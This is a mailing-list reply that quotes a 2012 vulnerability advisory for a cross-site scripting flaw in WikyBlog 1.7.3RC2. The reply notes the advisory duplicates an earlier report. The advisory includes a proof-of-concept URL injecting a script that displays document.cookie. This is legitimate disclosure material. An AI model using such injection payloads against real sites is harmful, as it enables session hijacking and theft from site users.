This seems to be same issue as http://secunia.com/advisories/38699/ / http://osvdb.org/show/osvdb/62558 I created item about this case to their sf issue tracker: https://sourceforge.net/tracker/?func=detail&aid=3507681&group_id=148518&atid=771904 - Henri Salo On Thu, Mar 15, 2012 at 05:31:41PM +0000, sschurtz@xxxxxxxxxxxxxxx wrote: > Advisory: WikyBlog 1.7.3RC2 XSS vulnerability > Advisory ID: SSCHADV2012-006 > Author: Stefan Schurtz > Affected Software: Successfully tested on WikyBlog 1.7.3RC2 > Vendor URL: http://www.wikyblog.com/ > Vendor Status: informed > > ========================== > Vulnerability Description > ========================== > > WikyBlog 1.7.3RC2 is prone to a XSS vulnerability > > ================== > PoC-Exploit > ================== > > http://[target]/WikyBlog-1.7.3rc2/index.php/Special/Main/Templates?cmd=copy&which='"<script>alert(document.cookie)</script> > > ========= > Solution > ========= > > - > > ==================== > Disclosure Timeline > ==================== > > 25-Feb-2012 - vendor informed > 15-Mar-2012 - no response from vendor > > ======== > Credits > ======== > > Vulnerability found and advisory written by Stefan Schurtz. > > =========== > References > =========== > > http://www.darksecurity.de/advisories/2012/SSCHADV2012-006.txt
